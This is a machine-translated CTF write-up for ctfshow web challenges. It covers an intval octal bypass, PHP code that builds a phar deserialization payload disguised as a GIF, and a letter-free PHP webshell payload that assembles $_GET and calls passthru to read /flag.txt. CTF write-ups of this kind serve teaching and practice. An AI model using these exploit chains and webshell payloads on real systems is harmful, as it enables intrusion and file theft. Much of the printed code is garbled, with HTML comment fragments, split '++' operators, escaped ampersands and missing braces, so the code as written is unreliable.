ctfshow eat melon cup web

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  • warm up
  • ATTup
    • code audit
    • phar deserialization
  • shellme
  • shellme_Revenge

Warm up


# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 16:53:59
# @link: https://ctfer.com


if(isset($_GET['num'])){<!-- -->
    $num = $_GET['num'];
    if($num==4476){<!-- -->
        die("no no no!");
    if(preg_match("/[a-z]|\./i", $num)){<!-- -->
        die("no no no!!");
    if(!strpos($num, "0")){<!-- -->
        die("no no no!!!");
    if(intval($num,0)===4476){<!-- -->
        echo $flag;

Check official documents

intval() function is used to get the integer value of a variable.

The intval() function returns the integer value of the variable var converted using the specified base base (decimal by default). intval() cannot be used on object, otherwise it will generate an E_NOTICE error and return 1.

PHP 4, PHP 5, PHP 7

int intval ( mixed $var [, int $base = 10 ] )
Parameter Description:

$var: the quantity value to convert to integer.
$base: The base used for conversion.
If base is 0, the base used is determined by checking the format of var:

If the string includes a "0x" (or "0X") prefix, use hexadecimal (hex); otherwise,
If the string starts with "0", use octal; otherwise,
Decimal will be used.

?num= + 010574


View the front-end source code to find the php file

upload.php find.php

Arbitrary file reading vulnerability, read find.php

<!--class View {<!-- -->
    public $fn;
    public function __invoke(){<!-- -->
        $text = base64_encode(file_get_contents($this->fn));
        echo "<script>alert('".$text."');self.location=document.referrer;</script>";
class Fun{<!-- -->
    public $fun = ":)";
    public function __toString(){<!-- -->
        $fuc = $this->fun;
        return "<script>alert('Be a happy string~');self.location=document.referrer;</script>";
    public function __destruct()
    {<!-- -->
        echo "<script>alert('Just a fun ".$this->fun."');self.location=document.referrer;</script>";
$filename = $_POST["file"];
$stat = @stat($filename);-->

Code Audit


(PHP 4, PHP 5, PHP 7, PHP 8)

stat - give information about a file
Here you can trigger phar deserialization

phar deserialization

class View {<!-- -->
    public $fn;
    public function __invoke(){<!-- -->
// $text = base64_encode(file_get_contents($this->fn));
// echo "<script>alert('".$text."');self.location=document.referrer;</script>";
class Fun{<!-- -->
    public $fun = ":)";
    public function __toString(){<!-- -->
        $fuc = $this->fun;
        return "1";
// return "<script>alert('Be a happy string~');self.location=document.referrer;</script>";
    public function __destruct()
    {<!-- -->
// echo "<script>alert('Just a fun ".$this->fun."');self.location=document.referrer;</script>";
$a=new Fun();
$a->fun=new Fun();
$a->fun->fun=new View();

$phar = new Phar("c2.phar");
$phar->setStub('GIF89a'.' __HALT_COMPILER();'); //Set stub
$phar->setMetadata($a); //Store custom meta-data into manifest
$phar->addFromString("test.txt", "test"); //Add files to be compressed
//Signature is automatically calculated

Directly modify the suffix to tar

and php cannot appear in the line $phar->setStub, otherwise it will prompt that the content is illegal

The basic structure of the stub: , the stub must end with __HALT_COMPILER();`, otherwise the Phar extension will not recognize the file.

Then access it with phar://c2.tar protocol

Decode to get flag


Search flag directly to get flag, unexpected solution?


Try to search for keywords such as ctfhsow, flag, ctf, hint, etc., and check information such as cookies

Set-Cookie hint=?looklook; expires=Sat, 20-May-2023 04:56:12 GMT; Max-Age=3600
PHP Version 7.2.34

if ($_GET['looklook']){<!-- -->
}else{<!-- -->
    setcookie("hint", "?looklook", time() + 3600);
if (isset($_POST['ctf_show'])) {<!-- -->
    $ctfshow = $_POST['ctf_show'];
    if (is_string($ctfshow) || strlen($ctfshow) <= 107) {<!-- -->
        if (!preg_match("/[!@#%^ & amp;*:'"|`a-zA-BD-Z~\\]|[4-9] /",$ctfshow)){<!-- -->
        }else{<!-- -->
            echo("fucccc hacker!!");
} else {<!-- -->

Generate ascii corresponding visible characters

with open("ascii.txt","w") as f:
    for i in range(31,128):
        f.writelines(chr(i) + "\\

Check out the regular content

$myfile = fopen("ascii.txt", "r") or die("Unable to open file!");
while (!feof($myfile)) {<!-- -->
    if (is_string($ctfshow) || strlen($ctfshow) <= 107) {<!-- -->
        if (!preg_match("/[!@#%^ & amp;*:'"|`a-zA-BD-Z~\\]|[4-9] /", $ctfshow)) {<!-- -->
            echo "$ctfshow";

first line is blank



Here try to execute commands by constructing arbitrary characters through + + and c

In PHP, if you forcibly concatenate an array and a string, the array will be converted to a string whose value is Array

$_ + + ; //D
$C= + + $_; //E
$_ + + ; //F
$C_= + + $_; //G
$_=(C/C.C)[0]; //N
$_ + + ; //O
$_ + + ; //P
$_ + + ; //Q
$_ + + ; //R
$_ + + ; //S
$_=_.$C_.$C. + + $_; //_GET
$$_[1]($$_[2]); //$_GET[1]($_GET[2])
ctf_show=$_=C;$_ + + ;$C= + + $_;$_ + + ;$C_= + + $_;$_=(C/C.C)[0];$_ + + ; $_ + + ;$_ + + ;$_ + + ;$_ + + ;$_=_.$C_.$C. + + $_;$$_[1]($$_[2]) ;
ctf_show=$_=C;$_++;$C=++$_;$_++;$C_=++$_;$_=(C/C.C)[0];$_++; $_++;$_++;$_++;$_++;$_=_.$C_.$C.++$_;$$_[1]($$_[2]) ;
?1=passthru & amp;2=cat /flag.txt

ctf_show=$_=C;$_++;$C=++$_;$_++;$C_=++$_;$_=(C/C.C)[0];$_++; $_++;$_++;$_++;$_++;$_=_.$C_.$C.++$_;$$_[1]($$_[2]) ;
;$C=++$_;$_++;$C_=++$_;$_=(C/C.C)[0];$_++;$_++;$_++;$ _++;$_++;$_=_.$C_.$C.++$_;$$_[1]($$_[2]);
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